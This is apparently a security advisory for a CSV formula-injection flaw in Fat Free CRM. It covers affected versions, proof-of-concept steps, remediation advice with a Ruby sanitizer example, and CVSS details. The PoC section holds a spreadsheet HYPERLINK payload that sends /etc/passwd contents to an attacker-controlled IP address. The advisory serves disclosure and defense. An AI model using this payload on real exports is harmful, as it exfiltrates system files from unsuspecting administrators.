WS-2021-0202

Date: August 4, 2021

Overview

In Fat Free CRM, v0.11.4 to v0.19.2 and v0.10.1-rc1 to 0.10.1-rc3, an attacker can register and create a new task with malicious CSV commands. When the data is exported by the user in CSV format, there is no check on the name field of the task, which can lead to the execution of arbitrary commands on the system.

Details

In Fat Free CRM, an attacker can register and create a new task with malicious CSV commands. After that, when the administrator exports the data in CSV format, there is no check on the name field of the task, which can lead to the execution of arbitrary commands on the system.

PoC Details

For demonstration purposes we'll use two users: test-user1 (low-privileged user) and ben (administrator). Log in as “test-user1” and create a new Task with the payload below in the name field (modify the IP address accordingly).
Then log in as “ben”, go to Tasks and confirm that the task created by the previous user, which contains the payload, is visible there. Export all the Tasks in CSV format. Start a simple HTTP server to receive the request and the exfiltrated data attached to it. The administrator opens the exported data in LibreOffice Calc, confirms all the dialog boxes and then clicks the malicious link created by the injected payload. The exfiltrated data can then be seen in the server logs, attached to the respective GET request.

PoC Code

=HYPERLINK(CONCATENATE("http://192.168.18.40:8080/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")

Affected Environments

v0.11.4 to v0.19.2 and v0.10.1-rc1 to 0.10.1-rc3

Remediation

To remediate this, ensure that no cell begins with any of the following characters:
Equals to (“=”),
Plus (“+”),
Minus (“-”),
At (“@”),
Tab (0x09),
Carriage return (0x0D).
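The following is an added example of the remediation described above, not code from Fat Free CRM: a Ruby helper that neutralizes any cell starting with one of the listed trigger characters by prefixing it with a single quote (so spreadsheet applications read it as text) before the row is written with the standard CSV library. The task rows and field names are constructed for illustration.

```ruby
require 'csv'

# Characters that make a spreadsheet treat a cell as a formula
# (the list from the Remediation section above).
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Neutralize a single cell before it is written to CSV.
# A leading trigger character is prefixed with a single quote so the
# spreadsheet reads the cell as literal text; non-String values and
# empty strings are returned unchanged.
def neutralize_csv_cell(value)
  return value unless value.is_a?(String) && !value.empty?
  FORMULA_TRIGGERS.include?(value[0]) ? "'" + value : value
end

# Build a CSV document from an array of row hashes, neutralizing every
# cell. CSV.generate also quotes fields containing commas or quotes,
# so the single-quote prefix survives the round trip intact.
def safe_csv(headers, rows)
  CSV.generate do |csv|
    csv << headers
    rows.each { |row| csv << headers.map { |h| neutralize_csv_cell(row[h]) } }
  end
end

# Constructed sample tasks: the first name starts with "=" like the PoC,
# the third with "-" (a trigger even though it looks like plain text).
SAMPLE_TASKS = [
  { "name" => "=HYPERLINK(\"http://example.invalid\";\"x\")", "priority" => "high" },
  { "name" => "Call customer back", "priority" => "low" },
  { "name" => "-5 days overdue", "priority" => "medium" },
].freeze

if __FILE__ == $0
  puts safe_csv(%w[name priority], SAMPLE_TASKS)
end
```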

Prevention

No fix

Language: Ruby

Good to know:

Improper Neutralization of Formula Elements in a CSV File

CWE-1236

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): Low